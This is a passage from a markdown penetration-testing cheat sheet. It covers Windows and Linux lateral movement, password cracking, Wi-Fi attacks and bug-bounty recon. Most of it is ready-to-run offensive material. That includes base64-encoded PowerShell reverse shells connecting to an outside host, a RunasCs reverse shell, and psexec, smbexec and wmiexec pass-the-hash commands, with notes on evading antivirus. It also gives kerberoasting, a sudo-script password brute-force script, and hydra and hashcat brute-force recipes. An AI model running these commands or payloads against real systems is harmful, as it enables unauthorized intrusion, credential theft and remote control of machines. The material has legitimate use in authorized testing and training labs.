JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMwA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -silentcommand Impacket v0.11.0 - Copyright 2023 Fortra #### Decode Password **[`^ back to top ^`](#overview)** PS C:\Users> echo 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6 > test.txt PS C:\Users> $EncryptedString = Get-Content .\test.txt PS C:\Users> $SecureString = ConvertTo-SecureString $EncryptedString PS C:\Users> $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString PS C:\Users> echo $Credential.GetNetworkCredential().password f8gQ8fynP44ek1m3 #### Evil-WinRM **[`^ back to top ^`](#overview)** Check users for accessebility to connect via winrm and connect to remote Windows machine via `winrm`: poetry run crackmapexec winrm IP -u users.txt -p 'PASSWORD' evil-winrm -i IP -u USERNAME -p 'PASSWORD' Connect via `windrm` with hash: evil-winrm -i IP -u 'USERNAME' -p 'HASH' #### kerbrute **[`^ back to top ^`](#overview)** Get valid users for domain: cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt possible-usernames.txt sed -i "s|$|@DOMAIN.COM|" possible-usernames.txt git clone https://github.com/ropnop/kerbrute.git cd kerbrute go build ./kerbrute userenum -d DOMAIN.COM ../possible-usernames.txt --dc DOMAIN.COM #### ntpdate **[`^ back to top ^`](#overview)** Sync time with domain controller: ntpdate -s dc01. #### powerview **[`^ back to top ^`](#overview)** Manual enumeration with powerview can see the permissions: faketime -f +7h impacket-getTGT /ldap_monitor:'PASSWORD' export KRB5CCNAME=./ldap_monitor.ccache faketime -f +7h python3 powerview.py /ldap_monitor@IP -k --no-pass --dc-ip IP --use-ldaps [2024-02-07 21:49:23] LDAP Signing NOT Enforced! (LDAPS)-[IP]-[rebound\ldap_monitor] PV > Get-ObjectAcl -Identity SERVICEMGMT #### psexec **[`^ back to top ^`](#overview)** **Connection principle**: It is to upload a binary file to the target machine `C:\Windows` directory through the pipeline and create a service on the remote target machine. Then run the binary file through the service, and delete the service and the binary file after running. As it will backtrack the attack process through logs when the attack is traced. The script will be checked by antivirus software when executing the uploaded binary file. (For example, the following example uploaded lfLHJWHE.exe with the service name Zeno, all randomly generated.) Connection conditions: open port `445`, any writable share for `IPC$` and `non-IPC$`. Because psexec has to write binary files to the target host. By default `C$` and admin$ are on. psexec.py DOMAIN/administrator@dc01. -hashes HASH #### Rubeus **[`^ back to top ^`](#overview)** Rubeus has a nopreauth parameter that can use the known username to perform Kerberoasting. ..\Rubeus-master\Rubeus\bin\Debug> .\Rubeus.exe kerberoast /nopreauth:username /domain:DOMAIN.COM /dc:dc01.DOMAIN.COM /ldaps /spns:users.txt /nowrap #### RunasCs **[`^ back to top ^`](#overview)** Getting reverse shell via `RunasCs`: .\RunasCs.exe USERNAME PASSWORD cmd.exe -r REMOTE_IP:4444 #### smbexec **[`^ back to top ^`](#overview)** **Connection Principle**: Similar to [psexec](#psexec), it creates a service on the remote system through file sharing, writes the command to be run through the service in a bat file to execute it, then writes the execution result in a file to get the output of the executed command, and finally deletes the bat file, the output file and the service. While this technique may help to evade AV, the creation or deletion of services generates a lot of logs, so it is easy to trace back. By default the script uses UTF-8 encoding, while most domestic machines use the default GBK encoding, which will result in a messy display back, you can use the -codec parameter to specify the GBK encoding. eg: `python3 smbexec.py administrator:root@ -codec gbk (demo) plaintext password, same for hash`) Sometimes you need to specify another share to connect to if the default C$ share is not enabled. The command to connect to the admin$ share is as follows: `python3 smbexec.py administrator:root@ -codec gbk -share admin$`. smbexec.py DOMAIN/administrator@dc01. -hashes HASH #### wmiexec.py **[`^ back to top ^`](#overview)** The script mainly uses WMI for command execution and does the best job of evading AV checks. wmiexec.py DOMAIN/administrator@dc01. -hashes HASH ### Linux Lateral Movement **[`^ back to top ^`](#overview)** Several tools can help you save time during the enumeration process. These tools should only be used to save time knowing they may miss some privilege escalation vectors. Below is a list of popular Linux enumeration tools with links to their respective Github repositories. Check `sudo` privileges: sudo -l #### Linux Search Non-Secure Files **[`^ back to top ^`](#overview)** Finding common users: awk -F: '{ if($3 >= 1000) print $1}' passwd >> users Finding SUID executables (dind files with permission to execute files they normally would not be allowed to): find / -perm -4000 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; Reading `bash_history` files: for user in $(cat home_users); do echo $user; cat /home/$user/.bash_history ; echo -e "=====\n" ;done Search in the files of directory `/etc` the string `pass`: grep -i -r "pass" ./etc/ grep -Frlw "pass" ./etc/ #### Unsafe Bash If we found something unsafe in the MYSQL bash script, [the unquoted variable comparison](https://github.com/anordal/shellharden/blob/master/how_to_do_things_safely_in_bash.md?source=post_page-----933488bfbfff--------------------------------). Variable expansion: Good: "$my_var" Bad: $my_var Command substitution: Good: "$(cmd)" Bad: $(cmd) It seems he can sudo run a backup script located at `/opt/scripts/mysql-backup.sh`. Inspect the code of the script which reveals to be vulnerable to wildcard injection. ... if [[ $DB_PASS == $USER_PASS ]]; then ... Okay, but how to exploit it, after searching online I have [found out](https://mywiki.wooledge.org/BashPitfalls?source=post_page-----933488bfbfff--------------------------------) that if right side of `==` is not quoted then bash does pattern matching against it, instead of treating it as a string. {valid_password_char}{*} Using double brackets in the if comparison allows us to use wildcards to guess the password, using a process similar to blind sql injections. To find out more about the difference between single brackets and double brackets read this: https://www.baeldung.com/linux/bash-single-vs-double-brackets#4-pattern-matching. In summary, both conditions ```[[$DB_PASS == Password123!]] and [[$DB_PASS == P* ]]``` will be evaluated as true in the if statement. To brute force the password you can use 3 methods: - **Manually**. Letter by letter, **not recommended**. - **Semi-manually**. Create a file called letter containing all lower-case, upper-case and digits and bruteforce them using a loop. As soon as you find a new character, add it to the for loop (e.g. ...echo abcde*...) and repeat until no more letters are discovered. Add letters sequentially as you discover in each iteration. The first loop iteration would look like this: for i in $(cat letters);do echo a* | sudo /opt/scripts/mysql-backup.sh && echo "$i";done - **Using a python script**. Elegant and fast. The machine also has perl installed. A proposed python script would be the following: import string import os chars = string.ascii_letters + string.digits password='' next=1 print("[+] Initializing bruteforce script...") print("[+] Bruteforce in progress, please wait...") while next==1: for i in chars: errorlevel=os.system("echo "+password+i+"* | sudo /opt/scripts/mysql-backup.sh >/dev/null 2>&1") if errorlevel==0: password=password+i print("[+] new character found: "+password) next=1 break else: next=0 print("[+] Process terminated, root password is: "+password) Or We can guess or brute force the first password character followed by * to bypass the password prompt. And we can also brute force every character of the password till we found all characters of the password. Here is the python script, I used to brute force and extract the password. import string import subprocess all = list(string.ascii_letters + string.digits) password = "" found = False while not found: for character in all: command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh" output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout if "Password confirmed!" in output: password += character print(password) break else: found = True Running it, the root mysql password is revealed in less than a minute, which turns out to be a reuse of the system's root password. joshua@server:~$ nano 1.py joshua@server:~$ python3 1.py k kl klj kljh kljh1 kljh12 kljh12k kljh12k3 kljh12k3j kljh12k3jh kljh12k3jha kljh12k3jhas kljh12k3jhask kljh12k3jhaskj kljh12k3jhaskjh kljh12k3jhaskjh1 kljh12k3jhaskjh12 kljh12k3jhaskjh12k kljh12k3jhaskjh12kj kljh12k3jhaskjh12kjh kljh12k3jhaskjh12kjh3 #### base64 **[`^ back to top ^`](#overview)** Base64 Encode/Decode: echo "TEST" | base64 VEVTVAo= echo "VEVTVAo=" | base64 --decode TEST ##### Powershell ToBase64String and Linux Base64 echo -n '$client = New-Object System.Net.Sockets.TCPClient("",4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF8 -t UTF16LE | base64 JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBO AGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAPABoAG8AcwB0AD4A IgAsADQANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0 AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4A LgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBl AGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUA bgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBP AGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4A QQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0 AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQA ZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBu AGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsA IAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAg AD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcA ZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBX AHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwA ZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBl AG4AdAAuAEMAbABvAHMAZQAoACkA echo "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAPABoAG8AcwB0AD4AIgAsADQANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" | base64 --decode $client = New-Object System.Net.Sockets.TCPClient("",4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ## 5. Password Cracking **[`^ back to top ^`](#overview)** ### 5.1 Useful Websites **[`^ back to top ^`](#overview)** * [gchq.github.io/CyberChef](https://gchq.github.io/CyberChef) – the cyber Swiss army knife. * [crackstation.net](https://crackstation.net) – massive password hash cracker. * [onlinehashcrack.com](https://www.onlinehashcrack.com) – online hash cracking service. * [hashkiller.io/listmanager](https://hashkiller.io/listmanager) – has many other tools. * [hashes.com/en/decrypt/hash](https://hashes.com/en/decrypt/hash) – has many other tools. * [weakpass.com/wordlist](https://weakpass.com/wordlist) – lots of password dumps. * [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists) – various wordlists and dictionaries. * [hashcat](https://hashcat.net/wiki/doku.php?id=hashcat) – world's fastest password cracker. * [hashcat example hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) – identify hash types. * [hivesystems.io/blog/are-your-passwords-in-the-green](https://www.hivesystems.io/blog/are-your-passwords-in-the-green) – password cracking time table. ### crunch **[`^ back to top ^`](#overview)** Generate a lower-alpha-numeric wordlist: crunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt See the list of all available charsets or add your own in `charset.lst` located at `/usr/share/crunch/` directory. Generate all the possible permutations from words: crunch -o crunch_wordlist.txt -p admin 123 \!\" crunch -o crunch_wordlist.txt -q words.txt Generate all the possible combinations from a charset: crunch 4 6 -o crunch_wordlist.txt -p admin123\!\" | Option | Description | | --- | --- | | -d | Limits the number of consecutive characters | | -f | Specifies a character set from a file | | -i | Inverts the output | | -l | When you use the -t option this option tells crunch which symbols should be treated as literals | | -o | Specifies the file to write the output to | | -p | Tells crunch to generate/permute words that don't have repeating characters | | -q | Tells crunch to read a file and permute what is read | | -r | Tells crunch to resume generate words from where it left off, -r only works if you use -o | | -s | Specifies a starting string | | -t | Specifies a pattern | | Placeholder | Description | | --- | --- | | \@ | Lower case characters | | \, | Upper case characters | | \% | Numbers | | \^ | Symbols | **Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.** Generate all the possible combinations from a placeholder: crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^ crunch 10 10 + + 123456 \!\" -o crunch_wordlist.txt -t admin@@%^^ crunch 10 10 -o crunch_wordlist.txt -t @dmin@@%^^ -l @aaaaaaaaa ### hash-identifier **[`^ back to top ^`](#overview)** To identify a hash type, run the following tool: hash-identifier ### Hashcat **[`^ back to top ^`](#overview)** Hash identify: hashcat --identify hash.txt hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt Example output: $6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@# Brute force MD5 hashes: hashcat -m 0 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt Brute force NetNTLMv1 hashes: hashcat -m 5500 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt Use `--session=` to save, and continue your cracking progress later using `--restore`. Continue cracking progress: hashcat --session=cracking --restore | Option | Description | | --- | --- | | -m | Hash-type, see references below | | -a | Attack-mode, see references below | | --force | Ignore warnings | | --runtime | Abort session after X seconds of runtime | | --status | Enable automatic update of the status screen | | -o | Define outfile for recovered hash | | --show | Show cracked passwords found in potfile | | --session | Define specific session name | | --restore | Restore session from --session | | --restore-file-path | Specific path to restore file | | -O | Enable optimized kernels (limits password length) | | -1 | User-defined charset ?1 | | -2 | User-defined charset ?2 | | -3 | User-defined charset ?3 | | -4 | User-defined charset ?4 | **When specifying a user-defined charset, escape `?` with another `?` (i.e., use `??` instead of `\?`).** | Hash Type | Description | | --- | --- | | 0 | MD5 | | 100 | SHA1 | | 1400 | SHA256 | | 1700 | SHA512 | | 200 | MySQL323 | | 300 | MySQL4.1/MySQL5 | | 1000 | NTLM | | 5500 | NetNTLMv1-VANILLA / NetNTLMv1-ESS | | 5600 | NetNTLMv2 | | 2500 | WPA/WPA2 | | 16800 | WPA-PMKID-PBKDF2 | | 16500 | JWT (JSON Web Token) | **For more hash types read the manual.** | Attack Mode | Name | | --- | --- | | 0 | Straight | | 1 | Combination | | 3 | Brute Force | | 6 | Hybrid Wordlist + Mask | | 7 | Hybrid Mask + Wordlist | | 9 | Association | | Charset | Description | | --- | --- | | \?l | abcdefghijklmnopqrstuvwxyz | | \?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ | | \?d | 0123456789 | | \?s | \!\"\#\$\%\&\'\(\)\*\+\,\-\.\/\:\;\<\=\>\?\@\^\_\`\{\|\}\~ | | \?a | \?l\?u\?d\?s | | \?b | 0x00 - 0xff | Dictionary attack: hashcat -m 100 -a 0 --session=cracking --force --status -O B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt hashcat -m 5600 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt You can find `rockyou.txt` wordlist in [SecLists](#wordlists). Brute force a hash using a placeholder: hashcat -m 0 -a 3 --session=cracking --force --status -O cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2 hashcat -m 0 -a 3 --session=cracking --force --status -O 85fb9a30572c42b19f36d215722e1780 -1 \!\"\#\$\%\&\/\(\)\=??\* -2 ?d?1 ?u?l?l?l?l?2?2?2 hashcat in mask mode, e.x. password like this template - `{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}`: nano hash.txt abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d hashcat with kerbrute: ./kerbrute userenum --dc -d spookysec.local userlist.txt -t 100 GetNPUsers.py spookysec.local/svc-admin -request -no-pass -dc-ip hashcat --force -m 18200 -a 0 svc-admin.hash /usr/share/wordlists/rockyou.txt ### Cracking the JWT **[`^ back to top ^`](#overview)** Dictionary attack: hashcat -m 16500 -a 3 --session=cracking --force --status -O eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds You can also check JWT cracking tool in project at [ivan-sincek/jwt-bf](https://github.com/ivan-sincek/jwt-bf). ### Hydra **[`^ back to top ^`](#overview)** Dictionary attack on an HTTP POST login web form: hydra -o hydra_results.txt -l admin -P rockyou.txt somesite.com http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed!' When brute forcing a login web form, you must specify `Login=Login:` to distinguish between the successful and failed login attempts. Change the `username` and `password` request parameter names as necessary. Dictionary attack on a Secure Shell (SSH) login: hydra -o hydra_results.txt -L users.txt -P rockyou.txt 192.168.8.5 ssh You can find a bunch of useful wordlists in [SecLists](#wordlists). | Option | Description | | --- | --- | | -R | Restore a previous aborted/crashed session | | -S | Perform an SSL connect | | -O | Use old SSL v2 and v3 | | -s | If the service is on a different default port, define it here | | -l | Login with a login name | | -L | Load several logins from a file | | -p | Login with a password | | -P | Load several passwords from a file | | -x | Password brute force generation (MIN:MAX:CHARSET), type "-x -h" to get help | | -y | Disable use of symbols in bruteforce | | -e | Try "n" null password, "s" login as pass and/or "r" reversed login | | -o | Write found login/password pairs to a file instead of stdout | | -f/-F | Exit when a login/pass pair is found (-f per host, -F global) | | -M | List of servers to attack, one entry per line, ':' to specify port | | Supported Services | | --- | | ftps | | https\-\{get\|post\}\-form | | mysql | | smb | | smtps | | snmp | | ssh | | telnets | | vnc | For more supported services read the manual. | Brute Force Syntax | Description | | --- | --- | | MIN | Minimum number of characters in the password | | MAX | Maximum number of characters in the password | | CHARSET | Charset values are: "a" for lowercase letters, "A" for uppercase letters, "1" for numbers, and for all others, just add their real representation | Brute force attack on FTP: hydra -o hydra_results.txt -l admin -x 4:4:aA1\!\"\#\$\% 192.168.8.5 ftp Some examples: hydra -l -P http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V -F -u hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV ftp hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV ssh hydra -l milesdyson -P /usr/share/wordlists/rockyou.txt -vV smb hydra -t 16 -L users.txt -p PASSWORD -vV ssh ### John the Ripper **[`^ back to top ^`](#overview)** Examples for crack: john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=raw-sha256 ### Password Spraying **[`^ back to top ^`](#overview)** ## 6. Wi-Fi **[`^ back to top ^`](#overview)** ### Pixie Dust **[`^ back to top ^`](#overview)** Scan avaliable an access point: iwlist scanning Pixie Dust attack on a specified BSSID with [oneshot](https://github.com/nikita-yfh/OneShot-C): ./oneshot -i wlan0 -K --bssid 02:00:00:00:01:00 Write `SSID` and `PSK` values to the `config` via `wpa_passphrase`: wpa_passphrase ACCESS_POINT_SSID 'PASSWORD' > config Connect to the Wi-Fi via `wpa_supplicant`: wpa_supplicant -B -c config -i wlan0 Set the static IP to `wlan0` interface: ifconfig wlan0 192.168.1.7 netmask 255.255.255.0 ifconfig wlan0: flags=4163 mtu 1500 inet 192.168.1.7 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::ff:fe00:800 prefixlen 64 scopeid 0x20 ether 02:00:00:00:08:00 txqueuelen 1000 (Ethernet) RX packets 2 bytes 282 (282.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 10 bytes 1084 (1.0 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 Or use another way for connecting to Wi-Fi. Configuration file `/etc/wpa_supplicant/wpa_supplicant-wlan0.conf`: ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 update_config=1 network={ ssid="ACCESS_POINT_SSID" psk="PASSWORD" key_mgmt=WPA-PSK proto=WPA2 pairwise=CCMP TKIP group=CCMP TKIP scan_ssid=1 } Configuration file `/etc/systemd/network/25-wlan.network`: [Match] Name=wlan0 [Network] DHCP=ipv4 Execute the command: systemctl enable wpa_supplicant@wlan0.service systemctl restart systemd-networkd.service systemctl restart wpa_supplicant@wlan0.service Find an active IP-addresses in the `wlan0` network: for i in `seq 1 255`; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done ### 7. One-Liners for Bug Bounty **[`^ back to top ^`](#overview)** **One line recon using pd tools:** subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt **Subdomain enumeration:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ## Juicy Subdomains subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn' ## from BufferOver.run curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u ## from Riddler.io curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ## from RedHunt Labs Recon API curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r ## from nmap nmap --script hostmap-crtsh.nse target.com ## from CertSpotter curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ## from Archive curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u ## from JLDC curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ## from crt.sh curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u ## from ThreatMiner curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u ## from Anubis curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com" ## from ThreatCrowd curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com" ## from HackerTarget curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" ## from AlienVault curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u ## from Censys censys subdomains target.com ## from subdomain center curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -u **LFI:** 